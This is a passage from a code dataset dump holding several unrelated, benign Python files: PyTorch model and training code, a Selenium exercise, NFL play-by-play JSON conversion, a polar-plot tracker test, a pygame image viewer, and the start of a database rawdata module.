input_batch_motions_f_12.cuda()\n input_batch_images_b_21 = input_batch_images_b_21.cuda()\n input_batch_motions_b_21 = input_batch_motions_b_21.cuda()\n predict_f_12,att_f_12 = model(input_batch_images_f_12)\n predict_b_21,att_b_21 = model(input_batch_images_b_21)\n result=[predict_f_12,att_f_12,predict_b_21,att_b_21]\n\n # loss calculation\n if with_attention_flag:\n batch_loss = loss.loss_functions.GroupWithATTLoss(\\\n predict_f_12, input_batch_motions_f_12,att_f_12, \\\n predict_b_21,input_batch_motions_b_21,att_b_21)\n elif pad_flag:\n batch_loss = loss.loss_functions.GroupWithSSLoss(\\\n predict_f_12, input_batch_motions_f_12, \\\n predict_b_21,input_batch_motions_b_21)\n\n else:\n batch_loss = loss.loss_functions.GroupLoss(\\\n predict_f_12, input_batch_motions_f_12, \\\n predict_b_21,input_batch_motions_b_21)\n\n return batch_loss,result\n\nif __name__ == '__main__':\n main()\n\n\n","sub_path":"src/padvo_train.py","file_name":"padvo_train.py","file_ext":"py","file_size_in_byte":7706,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"121049831","text":"import torch\nimport torch.nn as nn\nimport torch.nn.functional as F\n\n\nclass Encoder(nn.Module):\n\n def __init__(self, img_height, img_width, enc_size):\n '''\n args:\n img_height: height of image\n img_width: width of image\n enc_size: length of encoding vector\n '''\n super(Encoder, self).__init__()\n self.conv1 = nn.Conv2d(\n 3, 32, kernel_size=5, padding=2, stride=2)\n self.conv2 = nn.Conv2d(\n 32, 64, kernel_size=5, padding=2, stride=2)\n img_size = torch.tensor([img_height, img_width])\n self.num_conv_features = 64 * torch.prod(img_size / 4)\n self.fc = nn.Linear(self.num_conv_features, enc_size)\n\n def forward(self, x):\n '''\n args:\n x: input image\n returns:\n e: encoding vector\n '''\n print('x:', x.type(), x.size())\n x = F.relu(self.conv1(x))\n x = F.relu(self.conv2(x))\n x = x.view(-1, self.num_conv_features)\n e = self.fc(x)\n print('e:', e.type(), e.size())\n return e\n\n\nclass Memory(nn.Module):\n\n def __init__(self, enc_size, mem_size):\n '''\n args:\n enc_size: length of e vector\n mem_size: number of rows of Mkey and Mval\n '''\n super(Memory, self).__init__()\n # # TODO: better init method\n self.Wkey = nn.Parameter(torch.rand(mem_size, enc_size))\n self.Wval = nn.Parameter(torch.rand(mem_size, enc_size))\n\n def forward(self, E, h):\n '''\n args:\n E: matrix of encodings\n h: hidden vector\n returns:\n o: memory output vector\n '''\n # write\n Mkey = torch.matmul(self.Wkey, E)\n Mval = torch.matmul(self.Wval, E)\n\n # read\n h = h.unsqueeze(1)\n print('h:', h.type(), h.size())\n print('Mkey:', Mkey.type(), Mkey.size())\n p = F.softmax(torch.matmul(h, Mkey))\n p = p.transpose(1, 2)\n print('p:', p.type(), p.size())\n print('Mval:', Mval.type(), Mval.size())\n o = torch.matmul(Mval, p)\n o = o.squeeze()\n print('o:', o.type(), o.size())\n\n return o\n\n\nclass MLP(nn.Module):\n\n def __init__(self, context_size, mem_size, num_actions):\n '''\n args:\n context_size: length of context vector\n mem_size: number of rows of Mkey and Mval\n num_actions: number of available actions\n '''\n super(MLP, self).__init__()\n self.Wh = nn.Linear(context_size, mem_size, bias=False)\n self.Wq = nn.Linear(mem_size, num_actions, bias=False)\n\n def forward(self, h, o):\n '''\n args:\n h: context vector\n o: memory read vector\n returns:\n Q: vector of Q-values for each action\n '''\n # Minecraft paper used relu on half of hidden layer\n g = F.relu(self.Wh(h) + o)\n print('g:', g.type(), g.size())\n Q = self.Wq(g)\n return Q\n\n\nclass MQN(nn.Module):\n\n def __init__(self, img_height, img_width, enc_size, mem_size, num_actions):\n '''\n args:\n img_height: height of input image\n img_width: width of input image\n enc_size: length of encoding vector\n mem_size: number of rows of Mkey and Mval (=context_size)\n num_actions: number of available actions\n '''\n super(MQN, self).__init__()\n self.encoder = Encoder(img_height, img_width, enc_size)\n self.memory = Memory(enc_size, mem_size)\n # generates context vector\n self.Wc = nn.Linear(enc_size, mem_size, bias=False)\n self.mlp = MLP(mem_size, mem_size, num_actions)\n\n def forward(self, x, X):\n '''\n args:\n x: input image\n X: stacked previous images\n returns:\n Q: vector of quality for each action\n '''\n e = self.encoder(x)\n h = self.Wc(e)\n # generate encodings from observations\n E = []\n for i in range(X.size(1)):\n img = X[:, i, :, :, :].squeeze(1)\n e = self.encoder(img)\n e = e.unsqueeze(2)\n E.append(e)\n E = torch.cat(E, 2)\n print('E:', E.size())\n o = self.memory(E, h)\n Q = self.mlp(h, o)\n return Q\n\n\nif __name__ == '__main__':\n b = 32\n e = 10\n M = 25\n m = 5\n X = torch.rand(b, M, e)\n lin = nn.Linear(e, m)\n y = lin(X)\n print('y:', y.size())\n print(y)\n","sub_path":"MQN.py","file_name":"MQN.py","file_ext":"py","file_size_in_byte":4551,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"323060894","text":"from collections import namedtuple\n\nNAVY_SEAL = \"no.\"\nMODE_INT_TO_STRING = {\n 1: 'Single Elimination',\n 2: 'Double Elimination'\n}\nGENDER_INT_TO_STRING = {\n 0: \"😐\",\n 1: \"🚹\",\n 2: \"🚺\",\n 3: \"🚁\"\n}\n\nflash_categories = namedtuple('flash_type', ['message', 'error', 'warning', 'success'])\nSTYLE = flash_categories('primary', 'danger', 'warning', 'success')\n","sub_path":"lol9k1/utilities.py","file_name":"utilities.py","file_ext":"py","file_size_in_byte":379,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"471446974","text":"from selenium import webdriver\nfrom selenium.webdriver.chrome.options import Options\nfrom time import sleep\n\nclass Desafio:\n def __init__(self):\n chrome_options = Options()\n chrome_options.add_argument('--lang=pt-BR')\n self.driver = webdriver.Chrome(\n executable_path=r'./chromedriver.exe', options=chrome_options)\n\n \n def Iniciar(self):\n self.driver.get(\"https://cursoautomacao.netlify.app/\")\n pagina_desafios = self.driver.find_element_by_xpath(\"//a[text()='Desafios']\")\n pagina_desafios.click()\n sleep(2)\n checkbox_conversivel = self.driver.find_element_by_id(\"conversivelcheckbox\")\n checkbox_offroad = self.driver.find_element_by_id(\"offroadcheckbox\")\n sleep(2)\n if not checkbox_conversivel.is_selected():\n self.driver.execute_script(\"arguments[0].click()\", checkbox_conversivel)\n\n if not checkbox_offroad.is_selected():\n self.driver.execute_script(\"arguments[0].click()\", checkbox_offroad)\n\n\n\ndesafio = Desafio()\ndesafio.Iniciar()","sub_path":"mestre_web/desafios/desafio_interagindo_com_checkbox.py","file_name":"desafio_interagindo_com_checkbox.py","file_ext":"py","file_size_in_byte":1061,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"199637542","text":"'''\nCollection of Feature engineering functions.\n'''\n\nfrom sklearn.preprocessing import LabelEncoder\nfrom textblob import TextBlob\n\n\ndef filter_encoder(df):\n le = LabelEncoder()\n df['filters'] = le.fit_transform(df['filters'])\n return df\n\n\ndef num_tags(df):\n df['hashtags'] = df.hashtags.apply(lambda x: len(x))\n df['caption_hashtags'] = df.caption_hashtags.apply(lambda x: len(x))\n return df\n\n\ndef sentiment_encoder(df):\n\n # list fields to apply sentiment analysis\n sent_fields = []\n\n # apply sentiment analysis for each field of text data, obtaining polarity\n # (neg < neutral < pos: range [-1,1]) and subjectivity (object <\n # subjective: range [0,1])\n for field in sent_fields:\n df[str(field_) + 'polarity'] = df.apply(lambda x: TextBlob(x[field]\n ).sentiment.polarity, axis=1)\n df[str(field_) + 'subjectivity'] = df.apply(lambda x: TextBlob(x[field]\n ).sentiment.subjectivity, axis=1)\n return df\n","sub_path":"app/feature_engineering.py","file_name":"feature_engineering.py","file_ext":"py","file_size_in_byte":1090,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"318122926","text":"from threading import Thread\n\nimport numpy as np\n\nimport matplotlib\nmatplotlib.use('QT5Agg')\n\nfrom matplotlib import pyplot as plt\nfrom matplotlib.patches import Ellipse\n\nfrom pubsub import pub\nfrom random import uniform, randint\nfrom time import sleep\n\nfrom src.tracking.map import Map\nfrom src.utils.time_in_millis import time_in_millis\n\nclass TrackerTest(Thread):\n \"\"\"Integration test for tracking system\"\"\"\n def __init__(self):\n super().__init__()\n\n \"\"\"Initializes tracker test\"\"\"\n self.update_interval = 0.25\n\n # initialize map\n self.map = Map(None, True)\n\n # create polar plot\n self.fig = plt.figure()\n self.polar = self.fig.add_subplot(111, projection='polar')\n self.polar.set_ylim(0, 200)\n self.polar.grid(True)\n self.polar.set_title('Tracker Map')\n\n # set up rng, bearing, and type data lists for tracks\n self.covar_ellipses = []\n\n # set up rng, bearing, and type data lists for tracks\n self.det_rng_data = [0]\n self.det_bearing_data = [0]\n self.det_type_data = [0]\n self.dets = self.polar.scatter(self.det_rng_data, self.det_bearing_data, c='#ff4444', label='Detections', s=3)\n\n # set up legend\n box = self.polar.get_position()\n self.polar.set_position([box.x0, box.y0 + box.height * 0.1,\n box.width, box.height * 0.9])\n\n # Put a legend below current axis\n self.polar.legend(loc='upper center', bbox_to_anchor=(0.5, -0.05),\n fancybox=True, shadow=True, ncol=5)\n\n # color plot grey\n self.polar.set_facecolor('#F5F5F5')\n self.polar.set_alpha(0.2)\n\n # show plot (and set up blitting)\n plt.show(block=False)\n plt.pause(0.01)\n self.fig.canvas.draw()\n\n input('Make plot full screen then press enter')\n self.background = self.fig.canvas.copy_from_bbox(self.polar.bbox)\n\n # create initial detections\n num_initial_detections = 18\n # patterns: static, circle_CCW, circle_CW, circle_CCW_radial_out, circle_CW_radial_out, radial_out\n self.rng_rate_list = [0, 0, 0, 0.05, 0.05, 0.075] * 3\n self.bearing_rate_list = [0, 0.0375, -0.0375, 0.025, -0.025, 0] * 3\n self.frame_bounds = [(10, 175), (-180, 180)]\n self.spawn_detections(num_initial_detections)\n\n # set look frame parameters\n self.look_frame = 'aperture' #'full'\n self.look_rng = (0, 150) # initial (and perm) range range of look aperture\n self.look_bearing = (-70, 70) # initial bearing range of look aperture\n self.look_sweep = (-30, 30) # sweeps so that the center of the aperture goes between these two points\n self.pan_direction = 1 # direction of pan (+1 = CW, -1 = CCW)\n self.look_apertures = []\n self.num_apertures = 1\n\n # detection parameters\n self.detect_mode = 'regular' #'constant' #'random'\n self.detect_probability = 0.6\n\n # start tracker\n self.map.start()\n\n # initialize old update time (of detection)\n self.prev_time = [time_in_millis()] * num_initial_detections\n\n def run(self):\n \"\"\"Continually updates detections\"\"\"\n loop_counter = 0\n while True:\n sleep(self.update_interval)\n\n # get tracks from map\n self.get_data()\n\n # plot tracks and detections on map\n self.plot_data()\n\n # update detections\n self.update_detections(loop_counter)\n\n if self.look_frame == 'aperture':\n # move aperture\n self.pan_aperture()\n\n loop_counter = (loop_counter + 1) % 4\n\n def update_detections(self, send_counter):\n \"\"\"Updates detections by random dr and dtheta\"\"\"\n # loop through detections\n for ii in range(len(self.epoch_frame)):\n # get dt\n dt = (time_in_millis() - self.prev_time[ii]) / 1000.\n # get rng and bearing rate\n rng_rate, bearing_rate = self.rng_rate_list[ii], self.bearing_rate_list[ii]\n\n # adjust bearing rate based on distance from origin\n bearing_rate /= 0.5* self.epoch_frame[ii][0]\n\n # generate deltas\n rand_dr = uniform(-0.01, 0.01)\n rand_dtheta = uniform(-0.001, 0.001)\n \n dr = (rand_dr + rng_rate) * dt\n dtheta = (rand_dtheta + bearing_rate) * dt\n\n # fix wraparound\n theta = self.epoch_frame[ii][1] + dtheta\n rng = self.epoch_frame[ii][0] + dr\n if theta > 180:\n theta = -180 + (theta % 180)\n\n if rng < 0:\n rng *= -1\n theta %= -180\n\n # update detection with deltas\n self.epoch_frame[ii] = (rng, theta, self.epoch_frame[ii][2])\n\n # set detections for plotting\n self.det_rng_data = [det[0] for det in self.epoch_frame]\n self.det_bearing_data = [det[1] for det in self.epoch_frame]\n self.det_type_data = [det[2] for det in self.epoch_frame]\n\n idx_list = [1] * len(self.epoch_frame)\n\n if self.look_frame == 'aperture':\n # trim epoch frame to objects in view look aperture\n for ii, obj in enumerate(self.epoch_frame):\n if not self.look_rng[0] <= obj[0] <= self.look_rng[1] or \\\n not self.look_bearing[0] <= obj[1] <= self.look_bearing[1]:\n idx_list[ii] = 0\n\n if self.detect_mode == 'random':\n # trim epoch frame using randint (to determine whether or not to send data)\n for ii in range(len(idx_list)):\n if randint(0, 9) >= (self.detect_probability * 10):\n idx_list[ii] = 0\n\n elif self.detect_mode == 'regular':\n if send_counter != 0:\n idx_list = [0] * len(idx_list)\n\n elif self.detect_mode == 'constant':\n pass\n\n epoch_frame = [obj for (ii, obj) in zip(idx_list, self.epoch_frame) if ii == 1 ]\n\n # update map with detections\n pub.sendMessage('object(s) detected', epoch_frame = epoch_frame, frame_bounds = self.frame_bounds)\n\n def spawn_detections(self, n_dets):\n \"\"\"\n Creates n_dets random detections and places on Map\n Inputs:\n n_dets -- number of detections to create\n \"\"\"\n # initialize epoch frame\n epoch_frame = [0] * n_dets\n\n # generate random detections\n for ii in range(n_dets):\n rand_rng = uniform(*self.frame_bounds[0])\n rand_bearing = uniform(*self.frame_bounds[1])\n rand_type = randint(0, 2)\n \n # place in epoch_frame\n epoch_frame[ii] = (rand_rng, rand_bearing, rand_type)\n\n # save off epoch_frame\n self.epoch_frame = epoch_frame\n\n def get_data(self):\n \"\"\"Gets data from map return_object function\"\"\"\n # get data\n data = self.map.return_objects(bearingRange=[-180, 180], rngRange=[0, 200])\n\n # split data into rng, bearing, and type_data\n self.track_rng_data = [obj[0] for obj in data]\n self.track_bearing_data = [obj[1] for obj in data]\n self.track_type_data = [obj[2] for obj in data]\n self.track_conf_data = [obj[5] for obj in data]\n\n def plot_data(self):\n \"\"\"Updates plot using data\"\"\"\n # update tracks data\n self.draw_covar_ellipses(self._deg_2_rad(self.track_bearing_data), self.track_rng_data, self.track_conf_data)\n\n # update look aperture\n self.draw_look_aperture()\n\n # update detections data\n self.dets.set_offsets([*zip(self._deg_2_rad(self.det_bearing_data), self.det_rng_data)])\n\n # restore background (blitting)\n self.fig.canvas.restore_region(self.background)\n\n # draw tracks and dets\n for ellipse in self.covar_ellipses:\n self.polar.draw_artist(ellipse)\n self.polar.draw_artist(self.dets)\n\n # draw look aperture\n for line in self.look_apertures:\n self.polar.draw_artist(line[0])\n\n self.fig.canvas.blit(self.polar.bbox)\n\n self.fig.canvas.flush_events()\n\n for ii, track_conf in enumerate(self.track_conf_data):\n print(\"Track {}: confidence -- {}\".format(ii, track_conf))\n print(\"Track List Length: {}\".format(len(self.track_conf_data)))\n print('-------------------------------------------------------')\n\n def pan_aperture(self):\n \"\"\"\n Pans look aperture\n Side effects:\n self.look_bearing -- pans look bearing (at 0.5 deg per step)\n \"\"\"\n bearing_rate = 0.5\n aperture_center = sum(self.look_bearing) / 2.\n new_ap_center = aperture_center + (bearing_rate * self.pan_direction)\n\n if new_ap_center > self.look_sweep[1]:\n new_ap_center = self.look_sweep[1] - (new_ap_center % self.look_sweep[1])\n self.pan_direction *= -1\n elif new_ap_center < self.look_sweep[0]:\n new_ap_center = self.look_sweep[0] - (new_ap_center % self.look_sweep[0])\n self.pan_direction *= -1\n\n diff = new_ap_center - aperture_center\n self.look_bearing = tuple(bear + diff for bear in self.look_bearing[:])\n\n def draw_look_aperture(self):\n \"\"\"\n Draws look aperture\n Side Effects:\n self.look_apertures -- changes look aperture to reflect new look direction\n \"\"\"\n # remove old aperture from plot\n for artist in self.look_apertures:\n self.polar.lines.remove(artist[0])\n\n # re-init look_apertures list\n self.look_apertures = [0] * 3\n\n # create wedge\n rad_look_bearing = self._deg_2_rad(self.look_bearing)\n self.look_apertures[0] = self.polar.plot([rad_look_bearing[0]] * 2, [self.look_rng[0], self.look_rng[1]], \\\n '--', color = 'g', alpha = 0.6)\n self.look_apertures[1] = self.polar.plot([rad_look_bearing[1]] * 2, [self.look_rng[0], self.look_rng[1]], \\\n '--', color = 'g', alpha = 0.6)\n bearing_sweep = np.arange(rad_look_bearing[0], rad_look_bearing[1], (rad_look_bearing[1] - rad_look_bearing[0]) / 100.)\n self.look_apertures[2] = self.polar.plot(bearing_sweep, [self.look_rng[1]] * 100, \\\n '--', color = 'g', alpha = 0.6)\n\n for aperture in self.look_apertures:\n self.polar.add_artist(aperture[0])\n\n def draw_covar_ellipses(self, track_bearing_data, track_rng_data, track_conf_data):\n \"\"\"\n Draws covariance ellipses for each track\n Inputs:\n track_bearing_data -- list of track bearings (in rad)\n track_rng_data -- list of track ranges\n track_conf_data -- list of track confidences\n Side Effects:\n self.covar_ellipses -- sets list of covar ellipses to new origin, size\n \"\"\"\n # remove old ellipses from plot\n for artist in self.covar_ellipses:\n artist.remove()\n\n # re-init covar_ellipses list\n self.covar_ellipses = [0] * len(track_bearing_data)\n \n # generate ellipses for each track\n # NOTE: current method of getting covariances is a bit of hack... should create API to get covars in future\n for ii, (track_bearing, track_rng, track_conf) in enumerate(zip(track_bearing_data, track_rng_data, track_conf_data)):\n ellipse_center = (track_bearing, track_rng)\n ellipse_rng_radius = self.map.object_list[ii].kalman.covar[0, 0]\n ellipse_bearing_radius = np.radians(self.map.object_list[ii].kalman.covar[1, 1])\n ellipse_conf = track_conf\n if ellipse_conf > 0.7:\n color = 'green'\n elif ellipse_conf > 0.3:\n color = 'blue'\n else:\n color = 'red'\n\n alpha = 0.4\n\n self.covar_ellipses[ii] = Ellipse(ellipse_center, ellipse_bearing_radius, ellipse_rng_radius, \\\n angle = np.radians(track_bearing), alpha = alpha, color = color)\n\n self.polar.add_artist(self.covar_ellipses[ii])\n\n# print(\"Ellipse {}: {}\".format(ii, (ellipse_rng_radius, ellipse_bearing_radius)))\n\n def _deg_2_rad(self, data):\n \"\"\"Converts degrees to radians for plotting\"\"\"\n return [elem * (np.pi)/ 180. for elem in data]\n","sub_path":"integration_tests/tracking/tracker_integration_test.py","file_name":"tracker_integration_test.py","file_ext":"py","file_size_in_byte":12542,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"235702753","text":"import pygame, sys\nfrom pygame.locals import *\n\npygame.init()\npokemon2 = raw_input('Enter a Pokemon name: ')\nstr(pokemon2)\npokemon1 = pokemon2 + '.png'\nprint(pokemon1)\nscreen = pygame.display.set_mode((475,475),0,32)\npokemon = pygame.image.load(pokemon1).convert_alpha()\n\nwhile True:\n\tfor event in pygame.event.get():\n\t\tif event.type == QUIT:\n\t\t\tpygame.quit()\n\t\t\tsys.exit()\n\tstatus = pygame.key.get_focused()\n\tif status == True:\n\t\tpygame.quit()\n\t\tsys.exit()\n\tscreen.blit(pokemon, (0,0))\n\tpygame.display.update()\n","sub_path":"pygame/pygame1.5.py","file_name":"pygame1.5.py","file_ext":"py","file_size_in_byte":512,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"440364219","text":"import os\nimport json\nfrom pprint import pprint\nfrom pathlib import Path\nhome = str(Path.home())\nimport codecs\n\n\ndef convert_gsis_id(new_id):\n # 32013030-2d30-3032-3334-35395dc60da5\n # XXXX3030-2d30-3032-3334-3539XXXXXXXX\n # careful of odd one: 32030058-7973-2002-0202-020202020202020204e2f41\n # '00-0023459'\n return codecs.decode(new_id[4:-8].replace('-',''),\"hex\").decode('utf-8')\n\n\ndef pop_from_list_or_int(val):\n if type(val) == list:\n return val[0]\n else:\n return val\n\ndef parseTeam(gameDetail, team, old_team, result):\n if gameDetail[f'{team}PointsOvertime']:\n overtime = pop_from_list_or_int(gameDetail[f'{team}PointsOvertime'])\n else:\n overtime = 0\n\n result[f'{old_team}'] = {\n 'score': {\n \"1\": pop_from_list_or_int(gameDetail[f'{team}PointsQ1']),\n \"2\": pop_from_list_or_int(gameDetail[f'{team}PointsQ2']),\n \"3\": pop_from_list_or_int(gameDetail[f'{team}PointsQ3']),\n \"4\": pop_from_list_or_int(gameDetail[f'{team}PointsQ4']),\n \"5\": overtime,\n \"T\": pop_from_list_or_int(gameDetail[f'{team}PointsTotal']),\n },\n 'to': 0,\n 'abbr': pop_from_list_or_int(gameDetail[f'{team}Team'][f'abbreviation']),\n 'stats': {\n 'team': {\n \"totfd\": 0,\n \"totyds\": 0,\n \"pyds\": 0,\n \"ryds\": 0,\n \"pen\": 0,\n \"penyds\": 0,\n \"trnovr\": 0,\n \"pt\": 0,\n \"ptyds\": 0,\n \"ptavg\": 0,\n \"top\": \"00:00\"\n },\n },\n }\n\ndef convert_game_file(gameDetail, eid):\n result = {\n # Assume the game is always over\n \"weather\": None,\n \"media\": None,\n \"yl\": \"\",\n \"qtr\": \"Final\",\n \"note\": None,\n \"down\": 0,\n \"togo\": 0,\n \"redzone\": True,\n \"clock\": \"00:00\",\n \"posteam\": None, # Doesn't matter\n \"stadium\": None,\n \"scrsummary\": {}}\n\n parseTeam(gameDetail,'home', 'home', result)\n parseTeam(gameDetail,'visitor', 'away', result)\n drives = {}\n for i, drive in enumerate(gameDetail['drives']):\n drives[str(i)] = {\n 'posteam': 'SF',\n 'qtr': 1,\n 'redzone': True,\n 'fds': 0,\n 'result': 'Punt',\n 'penyds': 0,\n 'ydsgained': 0,\n 'numplays': 0,\n 'postime': '1:55',\n \"start\": {\n \"qtr\": 1,\n \"time\": \"15:00\",\n \"yrdln\": \"SF 25\",\n \"team\": \"SF\"\n },\n \"end\": {\n \"qtr\": 1,\n \"time\": \"13:05\",\n \"yrdln\": \"SF 34\",\n \"team\": \"SF\"\n },\n 'plays': {}\n }\n\n for play in file['data']['viewer']['gameDetail']['plays'][1:]:\n # if 'playType' not in play or play['playType'] in ['TIMEOUT', 'COMMENT']: # Doesn't contain driveSequenceNumber, and we don't need data for these.\n # continue\n try:\n new_play = {\n \"sp\": 0, # scoringPlay?\n \"qtr\": play['quarter'],\n \"down\": play['down'],\n \"time\": play[\"clockTime\"],\n \"yrdln\": play['yardLine'],\n \"ydstogo\": play['yardsToGo'],\n \"ydsnet\": play['driveNetYards'] if 'driveNetYards' in play else 0,\n \"desc\": play['playDescription'],\n \"note\": None,\n \"players\": {}\n }\n if ('possessionTeam.abbreviation' in play):\n new_play['posteam'] = play['possessionTeam.abbreviation']\n elif ('possessionTeam' in play and play['possessionTeam'] != None):\n new_play['posteam'] = play['possessionTeam']['abbreviation']\n else:\n new_play['posteam'] = ''\n\n # print(play['playDescription'])\n for sequence, stat in enumerate(play['playStats']):\n if 'playerName' in stat and stat['playerName'] != 'Team' and stat['playerName'] != None:\n player_id = convert_gsis_id(stat['gsisPlayer.id'] if 'gsisPlayer.id' in stat else stat['gsisPlayer']['id'])\n # print(f'{player_id} - {stat[\"playerName\"]}')\n if not player_id in new_play['players']:\n new_play['players'][player_id] = []\n new_play['players'][player_id].append({\n \"sequence\": sequence,\n \"clubcode\": stat['team.abbreviation'] if 'team.abbreviation' in stat else stat['team']['abbreviation'],\n \"playerName\": stat['playerName'],\n \"statId\": stat['statId'],\n \"yards\": stat['yards'],\n })\n else:\n new_play['players'][0] = [{\n \"sequence\": sequence,\n \"clubcode\": stat['team.abbreviation'] if 'team.abbreviation' in stat else stat['team']['abbreviation'],\n \"playerName\": None,\n \"statId\": stat['statId'],\n \"yards\": stat['yards'],\n }]\n if play['driveSequenceNumber'] == None:\n print(\"Empty driveSequenceNumber:\")\n print(new_play)\n else:\n drives[str(play['driveSequenceNumber']-1)]['plays'][play['playId']] = new_play\n except Exception as e:\n # print(play['playerName'])\n # print(play['playType'])\n print(e)\n # print(e)\n # print(e.args)\n # print(play)\n quit()\n\n result['drives'] = drives\n result = {\n eid: result\n }\n filename = f'../nflgame/gamecenter-json/{eid}.json'\n json.dump(result, open(filename, 'w'))\n os.system(f'gzip -f {filename}')\n\nschedule = json.load(open(f'../nflgame/schedule.json'))\n\n# for game in schedule['games']:\n# year = game[1]['year']\n# home = game[1]['home']\n# away = game[1]['away']\n# week = game[1]['week']\n# if year == 2019 and week == 1 and game[1]['season_type'] == 'REG':\n# print(game[0])\n# # print(game)\n# file = json.load(open(f'nflfastR-raw-master/raw/{year}/{year}_{str(week).zfill(2)}_{away}_{home}.json', 'r'))\n# gameDetail = file['data']['viewer']['gameDetail']\n# # print(gameDetail)\n# convert_game_file(gameDetail, game[0])\n# file = json.load(open(f'nflfastR-raw-master/raw/2019/2019_01_ATL_MIN.json', 'r'))\n\nfor game in schedule['games']:\n year = game[1]['year']\n home = game[1]['home']\n away = game[1]['away']\n week = game[1]['week']\n if year == 2021 and week == 3 and game[1]['season_type'] == 'REG':\n print(game[0])\n file = json.load(open(f'nflfastR-raw-master/raw/{year}/{year}_REG_{str(week).zfill(2)}_{away}_{home}.json', 'r'))\n gameDetail = file['data']['viewer']['gameDetail']\n # print(gameDetail)\n convert_game_file(gameDetail, game[0])\n\n\n# file = json.load(open(f'nflfastR-raw-master/raw/2021/2021_01_PHI_NE.json', 'r'))\n# gameDetail = file['data']['viewer']['gameDetail']\n# convert_game_file(gameDetail, '2021081901')\n","sub_path":"scrape/play-by-play.py","file_name":"play-by-play.py","file_ext":"py","file_size_in_byte":7294,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"239956008","text":"#!/usr/bin/env python2.7\r\n# -*- coding: utf-8 -*-\r\n\r\n# ------------------------------------------------------------------------------\r\n# Copyright (c) 2012-2013 Kabel Deutschland Vertrieb und Services GmbH (KDG)\r\n# This software is the proprietary information of KDG.\r\n# All Right Reserved.\r\n# ------------------------------------------------------------------------------\r\n\r\nimport collections\r\nimport logging\r\nimport datetime\r\nimport random\r\nimport time\r\nimport topology\r\nimport Queue\r\nimport thread\r\nimport sys\r\n\r\nimport netcam_config\r\nimport alertTexter\r\nlogger = logging.getLogger('modules.rawdata')\r\n\r\nLIBRARY_MODE = netcam_config.environment['library_mode']\r\n\r\nif not LIBRARY_MODE:\r\n import ibm_db\r\n import oracle\r\n\r\n\r\nclass Datapoint(collections.namedtuple('Datapoint',\r\n ['data',\r\n 'value',\r\n 'starttime',\r\n 'stoptime',\r\n 'node_name'])):\r\n \"\"\"\r\n A Namedtuple storing all information related to measured data.\r\n\r\n :var data: a Namedtuple containing further data\r\n :var value: the value of the *datapoint*\r\n :var starttime: the starttime where the *datapoint* is valid\r\n :var stoptime: the stoptime where the *datapoint* stops being valid\r\n :var node_name: the name of the :py:class:`~lib.modules.topology.Node` where the *datapoint* was generated\r\n \"\"\"\r\n pass\r\n\r\n\r\nclass Ticketdata(collections.namedtuple('Ticketdata',\r\n ['nr',\r\n 'id',\r\n 'zustand',\r\n 'klasse',\r\n 'dienst',\r\n 'annahme',\r\n 'abschluss',\r\n 'soll_von',\r\n 'soll_bis',\r\n 'stoer_von',\r\n 'stoer_bis',\r\n 'st1',\r\n 'st2',\r\n 'st3_st3',\r\n 'st3_zus',\r\n 'bemerkung',\r\n 'fehler',\r\n 'ergebnis',\r\n 'auftragsart',\r\n 'orgetyp',\r\n 'NE'])):\r\n \"\"\"\r\n A Namedtuple storing all information related to Ticket data.\r\n\r\n :var nr: A_Auftragsnr\r\n :var id: A_auftragseinheit_id\r\n :var zustand: A_bearbeitungszustand\r\n :var klasse: A_Auftragsklasse\r\n :var dienst: A_dienstkategorie\r\n :var ammahme: A_annehmezeitpunkt\r\n :var abschluss: A_Abschlusszeitpunkt\r\n :var soll_von: A_soll_von\r\n :var soll_bis: A_soll_bis\r\n :var stoer_von: A_stoer_von\r\n :var stoer_bis: A_stoer_bis\r\n :var st1: A_Auftragsbeschreibung_st1\r\n :var st2: A_Auftragsbeschreibung_st2\r\n :var st3_st3: ST3_ST3_Auftragsbeschreibung_max\r\n :var st3_zus: ST3_ZUS_Auftragsbeschreibung_max\r\n :var bemerkung: A_ref_BEM_bemerkung_max\r\n :var fehler: Ref_Fehlerursache\r\n :var ergebnis: Ref_Abschlussergebnis\r\n \"\"\"\r\n pass\r\n\r\n\r\nTEMP_TABLE = \"temp_rawdata\"\r\nTEMP_TABLE_CREATE_SQL = \"\"\"\r\nCREATE TABLE {}\r\n (\r\n nodename VARCHAR2(100)\r\n )\r\n\"\"\"\r\n\r\nTEMP_TABLE_IDX_SQL = \"\"\"\r\nCREATE INDEX IX{} on {}\r\n (\r\n nodename\r\n )\r\n\"\"\"\r\n\r\nDELPHI_CONNSTRING_DATA = (\"DATABASE={};HOSTNAME={};PORT={};PROTOCOL=TCPIP;UID={user};PWD={passwd};\"\r\n \"\".format('{}', '{}', '{}', user=netcam_config.delphi_db_data['user'],\r\n passwd=netcam_config.delphi_db_data['password']))\r\n\r\n\r\nDELPHI_REGIONS_DATA = netcam_config.delphi_regions_data\r\n\r\nDELPHI_CONNSTRING_PROCESS = (\"DATABASE={};HOSTNAME={};PORT={};PROTOCOL=TCPIP;UID={user};PWD={passwd};\"\r\n \"\".format('{}', '{}', '{}', user=netcam_config.delphi_db_process['user'],\r\n passwd=netcam_config.delphi_db_process['password']))\r\n\r\n\r\nDELPHI_REGIONS_PROCESS = netcam_config.delphi_regions_process\r\n\r\n\r\nGAPS_TABLE = 'gaps'\r\n\r\nGAPS_CREATE_SQL = \"\"\"\r\nCREATE TABLE {}\r\n (\r\n datakind VARCHAR2(50),\r\n gapstart DATE,\r\n gapend DATE\r\n )\r\n\r\n\"\"\".format(GAPS_TABLE)\r\n\r\nif not LIBRARY_MODE:\r\n oracle_db2 = oracle.Oracle()\r\n\r\n if not oracle_db2.exists_table(GAPS_TABLE):\r\n oracle_db2.executeSQL(GAPS_CREATE_SQL)\r\n del oracle_db2\r\n\r\n\r\ndef get_modems(t_interval, nodes):\r\n hierarchy = \"MAC\"\r\n return get_hierarchy_members(nodes, hierarchy)\r\n\r\n\r\ndef 